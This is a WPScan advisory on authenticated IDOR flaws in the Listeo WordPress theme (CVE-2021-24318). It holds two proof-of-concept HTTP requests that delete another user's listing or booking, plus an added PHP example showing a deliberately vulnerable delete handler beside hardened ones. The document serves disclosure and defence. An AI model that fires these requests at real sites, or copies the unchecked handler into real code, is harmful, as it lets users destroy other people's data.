WPScan


Listeo < 1.6.11 - Multiple Authenticated IDOR Vulnerabilities

Description

The theme did not verify that the post/page or booking being deleted belongs to the user making the request, so any authenticated user could delete arbitrary pages, posts and bookings via an IDOR vector.
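The root cause described above is a missing server-side ownership check: the nonce in the PoC requests only proves the request came from the user's own session, not that the object named by `listing_id` or `booking_id` belongs to that user. The following is an added example in generic WordPress PHP, not Listeo's code and not the theme's actual fix, showing the vulnerable pattern next to hardened listing and booking handlers. The function names, the `listing` post type, the bookings table and its columns, the allowed status values and the nonce action names are all assumptions.

```php
<?php
// Added example (not Listeo's code): ownership checks for a "delete my listing"
// handler and a "manage my booking" admin-ajax handler in a WordPress theme.
// Function, post type, table, column and nonce action names are hypothetical.

// --- Vulnerable pattern: the request parameters alone decide what is deleted. ---
function example_delete_listing_vulnerable() {
    // The nonce is valid for any logged-in user's own session, so this check
    // does not stop user A from passing user B's listing_id.
    check_admin_referer( 'example_delete_listing' );
    $listing_id = absint( $_GET['listing_id'] ?? 0 );
    wp_delete_post( $listing_id, true ); // any authenticated user can delete any post
}

// --- Hardened pattern: confirm the object belongs to the caller before acting. ---
function example_delete_listing_hardened() {
    if ( ! is_user_logged_in() ) {
        wp_die( 'Not allowed', 403 );
    }
    check_admin_referer( 'example_delete_listing' );

    $listing_id = absint( $_GET['listing_id'] ?? 0 );
    $listing    = get_post( $listing_id );

    // Reject missing posts, posts of an unexpected type, and posts owned by someone else.
    if ( ! $listing
        || 'listing' !== $listing->post_type                        // assumed post type
        || (int) $listing->post_author !== get_current_user_id() ) {
        wp_die( 'Not allowed', 403 );
    }
    // Defence in depth: also require the core capability for this specific post.
    if ( ! current_user_can( 'delete_post', $listing_id ) ) {
        wp_die( 'Not allowed', 403 );
    }
    wp_delete_post( $listing_id, true );
}

// Booking storage is assumed to be a custom table with id, user_id and status columns.
function example_manage_booking_hardened() {
    global $wpdb;
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'Not allowed', 403 );
    }
    check_ajax_referer( 'example_manage_booking', 'nonce' );

    $booking_id = absint( $_POST['booking_id'] ?? 0 );
    $status     = sanitize_key( $_POST['status'] ?? '' );
    $allowed    = array( 'approved', 'cancelled', 'deleted' ); // assumed status set
    if ( ! in_array( $status, $allowed, true ) ) {
        wp_send_json_error( 'Bad status', 400 );
    }

    $table   = $wpdb->prefix . 'example_bookings'; // hypothetical table name
    $user_id = get_current_user_id();

    // The ownership condition is part of the lookup, so a booking that belongs to
    // someone else is indistinguishable from one that does not exist.
    $owned = (int) $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$table} WHERE id = %d AND user_id = %d",
        $booking_id,
        $user_id
    ) );
    if ( 0 === $owned ) {
        wp_send_json_error( 'Not found', 404 );
    }

    // The WHERE clause repeats user_id so the write itself is scoped to the caller.
    $where = array( 'id' => $booking_id, 'user_id' => $user_id );
    if ( 'deleted' === $status ) {
        $wpdb->delete( $table, $where, array( '%d', '%d' ) );
    } else {
        $wpdb->update( $table, array( 'status' => $status ), $where, array( '%s' ), array( '%d', '%d' ) );
    }
    wp_send_json_success();
}
add_action( 'wp_ajax_example_manage_booking', 'example_manage_booking_hardened' );
```

The two hardened handlers share the same idea: the identifier supplied by the client is only ever used together with the identity of the authenticated user, both in the read that validates the request and in the write that acts on it. Repeating the `user_id` condition in the final `delete`/`update` closes the window between the check and the action if the object's owner changes in between.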

Proof of Concept

### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]

### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted
Affects Themes

listeo
Fixed in version 1.6.11

References

CVE
CVE-2021-24318
URL
https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-639%5D-Listeo-WordPress-Theme-v1.6.10.txt

Classification

Type

IDOR

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

No

WPVDB ID
9afa7e11-68b3-4196-975e-8b3f8e68ce56

Timeline

Publicly Published

2021-05-16 (about 1 year ago)

Added

2021-05-16 (about 1 year ago)

Last Updated

2021-05-18 (about 1 year ago)
